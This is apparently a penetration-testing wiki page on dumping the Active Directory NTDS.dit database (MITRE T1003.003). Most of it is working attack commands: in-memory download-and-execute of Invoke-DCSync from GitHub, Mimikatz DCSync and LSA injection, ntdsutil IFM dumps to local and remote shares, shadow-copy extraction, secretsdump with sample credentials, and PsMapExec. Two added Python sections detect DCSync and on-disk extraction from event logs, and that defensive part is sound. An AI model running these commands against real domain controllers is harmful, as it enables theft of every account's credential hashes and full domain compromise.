# NTDS

**ATT\&CK ID:** [T1003.003](https://attack.mitre.org/techniques/T1003/003/)

**Permissions Required:** **Administrator** | **SYSTEM**

**Description**

Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in `%SystemRoot%\NTDS\Ntds.dit` of a domain controller.

In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.

## Techniques

### Invoke-DCsync (PentestFactory)

**URL:** <https://github.com/pentestfactory/Invoke-DCSync>

Invoke-DCSync pulls Mimikatz, PowerView and ADRecon from GitHub into memory and then performs a DCSync against the domain.

```powershell
# Load into memory
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/pentestfactory/Invoke-DCSync/main/Invoke-DCSync.ps1")

# Execute
Invoke-DCSync
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F9j3Q7W3hGVBiSdptgBrN%2FInvoke-DCsync.png?alt=media\&token=ead8fdfe-9ed2-4430-bdfc-45325bbf231e)

### Invoke-DCSync (S3cur3Th1sSh1t)

```powershell
# Load into memory
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/Invoke-DCSync.ps1")

# Execute
Invoke-DCSync -dcfqdn DC01.security.local -username administrator
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F7OVPg0G0P50zG1MEKiNq%2Fimage.png?alt=media\&token=96bb6689-60d0-4759-a536-b2ccfb7cf042)

### Metasploit

```
use auxiliary/admin/smb/psexec_ntdsgrab
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fl2XLXGq87dDXELEuMgy9%2Fimage.png?alt=media\&token=dd7cf4be-3c20-4c77-84e5-7adc44f46c09)

`secretsdump.py` can then be used to pull hashes from the retrieved `ntds.dit` database together with the SYSTEM hive file (see the `secretsdump.py` section below).

### Mimikatz

```powershell
# Dump hashes for a specified user
Invoke-Mimikatz -command '"lsadump::dcsync /domain:security.local /user:moe"'

# Dump hashes for all users
Invoke-Mimikatz -command '"lsadump::dcsync /domain:security.local /all"'

# Dump hashes by injecting into the lsass process on the Domain Controller
Invoke-Mimikatz -command '"lsadump::lsa /inject"'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F9ZfAx56YBQ8xqBJb0LHx%2FMimikatz-user.png?alt=media\&token=0e76216e-222c-4645-a4ff-2176eceacf1e)
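From the defender's side, the DCSync requests made by Invoke-DCSync, Mimikatz `lsadump::dcsync` and the other tools above all ask the domain controller for the replication extended rights, which a DC logs in Security event 4662 when auditing of directory service access is enabled. The following detection logic is an added example (not part of the original page, and not code from any of the projects named here); it assumes the events have already been parsed into dictionaries with the field names shown, uses constructed sample records, and treats the `MSOL_` prefix as an assumed, site-specific allowlist for a synchronisation service account.

```python
"""Detect DCSync-style replication requests in Windows Security event 4662 records.

Added illustration, not code from the original page. It assumes the events were
already parsed into dicts with the field names used below; the sample records are
constructed for offline use.
"""
import re

# Extended rights a DCSync requests from a domain controller. The GUIDs are the
# rightsGuid values that appear in the Properties field of event 4662.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

CONTROL_ACCESS = 0x100  # "Control Access" bit of the 4662 AccessMask

# Assumed site-specific allowlist of service accounts that replicate by design
# (for example an identity-synchronisation account); adjust per environment.
ALLOWLIST_PREFIXES = ("MSOL_",)

GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

# Constructed sample records (not real log data).
SAMPLE_EVENTS = [
    {   # normal DC-to-DC replication by a computer account: expected
        "EventID": 4662, "Computer": "DC01", "SubjectUserName": "DC02$",
        "AccessMask": "0x100",
        "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # a user account asking for both replication rights: DCSync indicator
        "EventID": 4662, "Computer": "DC01", "SubjectUserName": "moe",
        "AccessMask": "0x100",
        "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # control access on an unrelated property GUID: not replication
        "EventID": 4662, "Computer": "DC01", "SubjectUserName": "moe",
        "AccessMask": "0x100",
        "Properties": "{00000000-0000-0000-0000-000000000000}",
    },
    {   # allowlisted synchronisation account
        "EventID": 4662, "Computer": "DC01", "SubjectUserName": "MSOL_a1b2c3",
        "AccessMask": "0x100",
        "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {"EventID": 4624, "Computer": "DC01", "SubjectUserName": "moe"},  # unrelated logon event
]


def replication_rights(properties: str):
    """Names of the replication extended rights referenced in a 4662 Properties field."""
    return [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]


def is_expected_replicator(account: str) -> bool:
    # Domain controller computer accounts end in '$'; other exceptions come from the allowlist.
    return account.endswith("$") or account.upper().startswith(ALLOWLIST_PREFIXES)


def dcsync_indicator(event: dict):
    """Return (host, account, rights) when the event looks like a DCSync, else None."""
    if event.get("EventID") != 4662:
        return None
    if int(event.get("AccessMask", "0x0"), 16) & CONTROL_ACCESS == 0:
        return None
    rights = replication_rights(event.get("Properties", ""))
    if not rights:
        return None
    account = event.get("SubjectUserName", "")
    if is_expected_replicator(account):
        return None
    return event.get("Computer", "?"), account, rights


def find_dcsync(events):
    """All DCSync indicators in an iterable of parsed events."""
    return [hit for hit in map(dcsync_indicator, events) if hit is not None]


if __name__ == "__main__":
    for host, account, rights in find_dcsync(SAMPLE_EVENTS):
        print(f"[{host}] replication rights requested by non-DC account {account}: {', '.join(rights)}")
```

The filter on the computer-account suffix is what keeps legitimate DC-to-DC replication out of the alert stream; the remaining noise is whatever non-DC accounts legitimately hold these rights in a given forest, which is why the allowlist is an environment-specific assumption rather than a fixed rule.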

### ntdsutil.exe (Native)

With access to the Domain Controller it's possible to run the `ntdsutil.exe` native binary to dump SAM, SYSTEM and ntds.dit ready for exfiltration.

```powershell
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\Exfiltration' q q"

# Dump to remote share
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full \\10.10.10.10\Share\Exf' q q"
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FbBbZwZjAl9UUwUomV6PT%2Fntdsutil.exe.png?alt=media\&token=3a8331d1-f1bd-49c5-bdac-063432afa1d1)

Viewing the contents of `c:\Exfiltration` shows the files that were written.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FpOuEWzPoj2Ib3rxhJEZp%2Fntdsuitl.exe%20results.png?alt=media\&token=c203a16f-59b1-4276-9004-202d2e4a9375)

`secretsdump.py` can then be used against these files for extraction, as shown in the `secretsdump.py` section below.

### Secretsdump.py

```bash
# With valid credentials
secretsdump.py security.local/moe:Password123@10.10.10.100 -just-dc-ntlm
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FZhhRcK2fgsfqp3hLUscZ%2Fimage.png?alt=media\&token=ae75f1f6-ce07-41c3-b4d9-8f928d3557e5)

```bash
# Dump from exfiltrated ntds.dit and SYSTEM files.
sudo secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FVm5RaGlFBMxfQ1knhMVe%2Fimage.png?alt=media\&token=b1b9d3fc-8062-420d-9cc0-f1fce3da1c38)

```bash
# Dump results from ntdsutil.exe method
secretsdump.py -system SYSTEM -security SECURITY -ntds ntds.dit LOCAL
```

### PsMapExec

```powershell
# As current user
PsMapExec -Targets DCs -Method SMB -Module NTDS

# As a specified user
PsMapExec -Targets DCs -Method SMB -Module NTDS -Username Administrator -Password Password123!
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FxYiXa0P5PBMIUGQwLSof%2Fimage.png?alt=media\&token=891e5b23-6e4c-4784-921f-dc5bfef37235)

### Volume Shadow Copy

```cmd
# Create a VSS snapshot of the system drive
vssadmin create shadow /for=C:

# Copy NTDS.dit and SYSTEM out of the snapshot into C:\Exfiltration
# (the HarddiskVolumeShadowCopyN number comes from the vssadmin output above)
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\Exfiltration
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SYSTEM C:\Exfiltration
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FmZFMeGemWY2EkqM1JmYE%2Fvss-copy.png?alt=media\&token=55d02f9e-bfaa-4a49-93f7-85e7b376bdbb)

The NTDS.dit and SYSTEM files can be exfiltrated off the system and used with a tool such as `secretsdump.py` for hash extraction.
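The ntdsutil, Volume Shadow Copy and Metasploit methods above all touch the database on disk rather than over the replication protocol, so they leave different traces than a DCSync: a process-creation record (Security 4688 or Sysmon event 1) for `ntdsutil ... ifm`, for `vssadmin create shadow`, or for a copy from a `HarddiskVolumeShadowCopy` path, and ESENT Application-log events 325/327 naming an `ntds.dit` outside the live `%SystemRoot%\NTDS` directory when IFM writes its copy. The rule set below is an added example for defenders (not part of the original page); it assumes the events are already parsed into dictionaries with the fields shown, and the sample records are constructed and do not reproduce the exact wording of real ESENT messages.

```python
"""Flag on-disk NTDS extraction (ntdsutil IFM, shadow-copy file copies) in host telemetry.

Added illustration, not code from the original page. It assumes process-creation
events (Security 4688 or Sysmon 1) and ESENT Application-log events have been
parsed into dicts with the fields used below; the sample records are constructed
for offline use and do not reproduce real message formats exactly.
"""
import re

# Each rule: name, the event IDs it applies to, the field to inspect, and a pattern.
RULES = [
    ("ntdsutil-ifm", {4688, 1}, "CommandLine",
     re.compile(r"ntdsutil.*\b(?:ifm|create\s+full)\b", re.I | re.S)),
    ("vss-shadow-created", {4688, 1}, "CommandLine",
     re.compile(r"vssadmin(?:\.exe)?\s+create\s+shadow", re.I)),
    ("ntds-copied-from-shadow", {4688, 1}, "CommandLine",
     re.compile(r"HarddiskVolumeShadowCopy\d+\\Windows\\NTDS\\ntds\.dit", re.I)),
    # ESENT 325 (database created) / 327 (database detached) naming an ntds.dit that is
    # not under \Windows\NTDS\, as happens when IFM writes its copy. Assumes the live
    # database has not been relocated; adjust the excluded path if it has.
    ("ntds-database-outside-ntds-dir", {325, 327}, "Message",
     re.compile(r"(?<!\\Windows\\NTDS\\)ntds\.dit", re.I)),
]

# Constructed sample records (not real log data).
SAMPLE_EVENTS = [
    {"EventID": 4688, "Computer": "DC01", "SubjectUserName": "moe",
     "CommandLine": r'ntdsutil.exe "ac i ntds" "ifm" "create full c:\Exfiltration" q q'},
    {"EventID": 1, "Computer": "DC01", "SubjectUserName": "moe",
     "CommandLine": "vssadmin create shadow /for=C:"},
    {"EventID": 4688, "Computer": "DC01", "SubjectUserName": "moe",
     "CommandLine": r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\Exfiltration"},
    {"EventID": 325, "Computer": "DC01",
     "Message": r"NTDSB: The database engine created a new database (2, C:\Exfiltration\Active Directory\ntds.dit)."},
    {"EventID": 327, "Computer": "DC01",  # normal detach of the live database, e.g. on reboot
     "Message": r"NTDS: The database engine detached a database (1, C:\Windows\NTDS\ntds.dit)."},
    {"EventID": 4688, "Computer": "WS01", "SubjectUserName": "helpdesk",
     "CommandLine": "vssadmin list shadows"},  # read-only, not a snapshot creation
]


def match_rules(event: dict):
    """Names of the rules whose pattern matches the relevant field of one event."""
    return [name for name, event_ids, field, pattern in RULES
            if event.get("EventID") in event_ids and pattern.search(event.get(field, ""))]


def scan(events):
    """(host, rule, evidence) for every rule match across the events."""
    fields = {name: field for name, _, field, _ in RULES}
    return [(event.get("Computer", "?"), name, event.get(fields[name], ""))
            for event in events for name in match_rules(event)]


def correlate(hits, minimum=2):
    """Hosts on which at least `minimum` distinct rules fired. Several stages of the
    same extraction on one host (snapshot, then copy of NTDS.dit out of it) are a much
    stronger signal than any single rule on its own."""
    by_host = {}
    for host, rule, _ in hits:
        by_host.setdefault(host, set()).add(rule)
    return {host: sorted(rules) for host, rules in by_host.items() if len(rules) >= minimum}


if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for host, rule, evidence in hits:
        print(f"[{host}] {rule}: {evidence}")
    for host, rules in correlate(hits).items():
        print(f"[{host}] multiple extraction stages observed: {', '.join(rules)}")
```

The individual command-line rules will also fire on legitimate backups that use IFM or shadow copies, so the correlation step matters: the combination of a snapshot and a copy of `NTDS.dit` out of it, or an IFM run followed by an ESENT event for a database outside `%SystemRoot%\NTDS`, is what should be raised rather than each event alone.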
